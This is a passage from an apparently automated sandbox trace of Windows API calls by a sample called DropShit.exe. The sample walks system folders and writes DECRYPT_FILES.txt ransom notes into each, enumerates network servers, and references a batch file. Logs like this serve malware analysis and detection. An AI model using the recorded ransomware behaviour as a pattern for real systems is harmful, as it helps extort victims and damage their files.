lpFileName="C:\\Boot\\zh-CN\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0055.716] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\zh-cn\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0055.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0055.717] WriteFile (in: hFile=0x3d4, lpBuffer=0x2222ff0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x2222ff0*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.717] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0055.718] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0055.718] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.767] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.767] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.767] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.767] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.767] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0055.767] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0055.767] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.768] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.768] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.768] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0055.768] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.768] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0055.768] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\zh-hk\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0055.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0055.769] WriteFile (in: hFile=0x3d4, lpBuffer=0x2226ab8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x2226ab8*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.771] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0055.771] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0055.771] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.771] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.772] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.772] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.772] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0055.772] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0055.772] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0055.772] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.772] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.772] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0055.773] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0055.773] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0055.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0055.773] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0055.773] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\zh-tw\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0055.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0055.773] WriteFile (in: hFile=0x3d4, lpBuffer=0x222a4e0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x222a4e0*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.774] GetFullPathNameW (in: lpFileName="C:\\Boot\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x19 [0055.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16db60) returned 1 [0055.774] CreateFileW (lpFileName="C:\\Boot\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0055.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16dad0) returned 1 [0055.775] WriteFile (in: hFile=0x3d4, lpBuffer=0x222cb60*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16dba8, lpOverlapped=0x0 | out: lpBuffer=0x222cb60*, lpNumberOfBytesWritten=0x16dba8*=0x9d5, lpOverlapped=0x0) returned 1 [0055.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16dbf0) returned 1 [0055.776] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x16d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0055.776] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0055.776] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x16d890 | out: lpFindFileData=0x16d890*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.776] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.777] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.777] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db40) returned 1 [0055.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db00) returned 1 [0055.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16dbf0) returned 1 [0055.777] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x16d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0055.777] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0055.777] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x16d890 | out: lpFindFileData=0x16d890*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddd90 [0055.777] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.777] FindNextFileW (in: hFindFile=0x1a5ddd90, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.777] FindClose (in: hFindFile=0x1a5ddd90 | out: hFindFile=0x1a5ddd90) returned 1 [0055.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db40) returned 1 [0055.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db00) returned 1 [0055.777] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0055.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16db60) returned 1 [0055.778] CreateFileW (lpFileName="C:\\Config.Msi\\DECRYPT_FILES.txt" (normalized: "c:\\config.msi\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0055.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16dad0) returned 1 [0055.778] WriteFile (in: hFile=0x3d4, lpBuffer=0x2230210*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16dba8, lpOverlapped=0x0 | out: lpBuffer=0x2230210*, lpNumberOfBytesWritten=0x16dba8*=0x9d5, lpOverlapped=0x0) returned 1 [0077.029] NetServerEnum (in: servername=0x0, level=0x65, bufptr=0x16e738, prefmaxlen=0xffffffff, entriesread=0x16e730, totalentries=0x16e728, servertype=0x1, domain=0x0, resume_handle=0x0 | out: bufptr=0x16e738, entriesread=0x16e730, totalentries=0x16e728, resume_handle=0x0) returned 0x17e6 [0089.376] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1a62a800 [0089.376] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a62a6c0 [0089.376] LocalAlloc (uFlags=0x0, uBytes=0x4e) returned 0x1a5de090 [0089.440] LocalFree (hMem=0x1a62a800) returned 0x0 [0089.440] LocalFree (hMem=0x1a62a6c0) returned 0x0 [0089.440] LocalFree (hMem=0x1a5de090) returned 0x0 [0089.440] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1a62a6c0 [0089.440] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a62a800 [0089.440] LocalAlloc (uFlags=0x0, uBytes=0x48) returned 0x1a640da0 [0089.536] LocalFree (hMem=0x1a62a6c0) returned 0x0 [0089.536] LocalFree (hMem=0x1a62a800) returned 0x0 [0089.536] LocalFree (hMem=0x1a640da0) returned 0x0 [0089.536] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1a62a800 [0089.536] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1a62a6c0 [0089.536] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x1a640da0 [0089.825] LocalFree (hMem=0x1a62a800) returned 0x0 [0089.825] LocalFree (hMem=0x1a62a6c0) returned 0x0 [0089.825] LocalFree (hMem=0x1a640da0) returned 0x0 [0090.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", nBufferLength=0x105, lpBuffer=0x16de60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x0) returned 0x32 [0090.543] GetCurrentProcessId () returned 0xa44 [0090.543] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x43c [0090.544] EnumProcessModules (in: hProcess=0x43c, lphModule=0x2313cd8, cb=0x200, lpcbNeeded=0x16e4e0 | out: lphModule=0x2313cd8, lpcbNeeded=0x16e4e0) returned 1 [0091.351] GetModuleInformation (in: hProcess=0x43c, hModule=0x2a0000, lpmodinfo=0x2313f48, cb=0x18 | out: lpmodinfo=0x2313f48*(lpBaseOfDll=0x2a0000, SizeOfImage=0x10000, EntryPoint=0x2aa87e)) returned 1 [0091.351] CoTaskMemAlloc (cb=0x804) returned 0x1a65a3f0 [0091.351] GetModuleBaseNameW (in: hProcess=0x43c, hModule=0x2a0000, lpBaseName=0x1a65a3f0, nSize=0x800 | out: lpBaseName="DropShit.exe") returned 0xc [0091.351] CoTaskMemFree (pv=0x1a65a3f0) [0091.351] CoTaskMemAlloc (cb=0x804) returned 0x1a65a3f0 [0091.351] GetModuleFileNameExW (in: hProcess=0x43c, hModule=0x2a0000, lpFilename=0x1a65a3f0, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x32 [0091.351] CoTaskMemFree (pv=0x1a65a3f0) [0091.351] CloseHandle (hObject=0x43c) returned 1 [0091.354] CoTaskMemAlloc (cb=0x20c) returned 0x1a6391c0 [0091.354] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a6391c0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x32 [0091.354] CoTaskMemFree (pv=0x1a6391c0) [0091.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", nBufferLength=0x105, lpBuffer=0x16df90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x0) returned 0x32 [0091.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16de60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0091.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", nBufferLength=0x105, lpBuffer=0x16e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", lpFilePart=0x0) returned 0x2f [0091.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", nBufferLength=0x105, lpBuffer=0x16ddb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 